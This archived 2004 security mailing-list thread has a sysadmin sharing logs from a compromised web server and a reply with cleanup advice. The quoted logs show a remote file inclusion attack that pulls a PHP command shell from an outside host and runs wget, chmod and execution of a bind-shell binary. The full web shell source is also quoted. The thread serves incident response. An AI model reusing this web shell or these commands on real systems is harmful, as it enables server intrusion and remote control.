|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Hack attempt
From: security (security
kalamiteit.nl)
Date: Fri Jul 23 2004 - 07:40:33 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
well dear Norbert, is not some kind of attack .. it is simply a script
kiddy, that managed to get that inject.txt( actually a php script ) on
your server, and then simply began executing commands, on your server
after getting a bindshell, from the name probably on port 8080,
now, as the dude got an egg drop on there, he's probably some script
kiddy, who uses your server for irc stuff (can be anything) waiting for
his '31337' master to tell him to DoS someone, which is also possible.
now there is not much to worry if you have not had more messages from
tripwire telling you there are some binaries that has been changed, i
guess that dude is too lame to even get root, and change binaries with
backdoored ones, and then change the tripwire checksums database.
anyways .. just remove those files, try to find how he managed to get
his php script on there, also try to look has a weak passwd and tell
him/her to change it !
or even better .. just place all kind of monitoring tools, and look if
he comes back, and try to see how bad it exactly is, in the meanwhile, i
would start building a new server that is safer, and then migrate the
client stuff from the compromised machine to the new server, and then
audit the compromised machien
cheers, Amine
Norbert Crettol wrote:
>Hi all.
>
>This is my first post here. I'm Norbert Crettol, one of the sysadmins
>of Idiap, a research center in Switzerland (www.idiap.ch).
>
>We've had a undesired visitor, last night, that I discovered in the
>reports of tripwire.
>
>Here are the logs we got (we get a remote copy of the web server logs
>in another host). As of the second line, I've stripped the head and
>the tail of the line which is allways the same.
>--- begin ---
>"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
>--- end ---
>I've seen no other
>
>It looks like bind8080 has created a directory /var/lock/.tmp
>and expanded an (owned by the web server owner) archive there. Here
>is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
>Here is the content of http://www.bosscalvin.com/inject.txt :
>--- begin ---
><font color="red">
><br><font face="Comic Sans MS" size="2"><center>
><b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
><b>#</b> CMD PHP : <br>
><b>#</b> Released by : <b>SecurityCorp</b><br>
><b>#</b> Edited by CaEm
><br>
><br>
><hr color="red" width=751px height=115px>
><br>
><pre><font face="Verdana" size="1">
><?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
>?>
></font></pre>
><br>
><hr color="red" width=751px height=115px>
><br>
><font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b> </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
>--- end ---
>
>Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
>Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
>Is there a way to stop this guy ? His nickname (CaEm) appears in the
>the uploaded scripts.
>
>Norbert
>
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]